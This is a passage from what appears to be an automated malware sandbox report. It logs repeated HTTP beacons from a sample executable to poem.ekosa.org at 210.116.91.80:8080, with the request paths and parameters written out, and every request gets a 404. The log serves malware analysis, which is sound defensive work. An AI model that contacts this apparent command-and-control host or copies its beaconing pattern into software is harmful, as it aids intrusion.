      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:45.522773027 CET588INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:44 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      84192.168.2.449854210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:45.909315109 CET588OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:46.173079967 CET589INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:46 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      85192.168.2.449855210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:46.442652941 CET590OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:46.706830025 CET590INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:46 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      86192.168.2.449856210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:46.973223925 CET591OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:47.235138893 CET592INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:47 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      87192.168.2.449857210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:47.623301983 CET592OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:47.884114981 CET593INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:47 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      88192.168.2.449858210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:48.153604984 CET594OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:48.416039944 CET594INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:48 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      89192.168.2.449859210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:48.682172060 CET595OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:48.944469929 CET596INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:48 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      9192.168.2.449769210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:01.867994070 CET236OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:02.130270958 CET242INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      90192.168.2.449860210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:49.322773933 CET596OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:49.582149029 CET597INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:49 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      91192.168.2.449861210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:49.851074934 CET608OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:50.115175962 CET618INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:49 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      92192.168.2.449864210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:50.402518034 CET649OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:50.662182093 CET653INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:50 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
